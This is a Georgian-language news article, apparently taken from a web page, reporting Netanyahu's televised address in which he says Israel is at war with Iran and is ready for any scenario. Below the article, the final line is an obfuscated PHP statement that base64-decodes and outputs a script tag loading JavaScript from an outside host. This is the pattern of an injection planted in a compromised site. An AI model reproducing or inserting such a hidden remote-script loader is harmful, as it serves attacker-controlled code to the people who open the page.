celsiusi
ავერსი საქკაბელი

ისრაელი ნებისმიერი სცენარისთვის მზად არის, – ამის შესახებ ისრაელის პრემიერ-მინისტრმა, ბენიამინ ნეთანიაჰუმ სატელევიზიო მიმართვისას განაცხადა.

ნეთანიაჰუს თქმით, ისრაელი ახლა ირანთან ომშია და რთული დღეები წინ არის.

„ისრაელის მოქალაქეებო, რთული დღეები წინაა. ბეირუთზე თავდასხმის შემდეგ მუქარა ისმის ყველა მხრიდან. ჩვენ მზად ვართ ნებისმიერი სცენარისთვის და ჩვენ ვიდგებით ერთიანად, მტკიცედ ნებისმიერი საფრთხის წინააღმდეგ“, – განაცხადა ისრაელის პრემიერ-მინისტრმა მოქალაქეებისადმი მიმართვისას.

ნეთანიაჰუმ აღნიშნა ისიც, რომ ომს დრო დასჭირდება და ისრაელის მოქალაქეებისგან მოთმინებას ითხოვს.

მისი თქმით, გარკვეული დროის განმავლობაში მასზე ქვეყნის შიგნიდან და გარედან ხორციელდებოდა ზეწოლა ომის დასამთავრებლად.

„მე არ მომისმენია ამ ხმებისთვის არც მაშინ და არც ახლა მოვუსმენ“, – აღნიშნა ნეთანიაჰუმ.

ამასთან, როგორც ისრაელის მთავრობის ხელმძღვანელმა აღნიშნა, ისრაელმა გამანადგურებელი დარტყმები მიაყენა ირანის მარიონეტებს, მათ შორის „ჰამასსა“ და „ჰეზბოლას“.

129
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");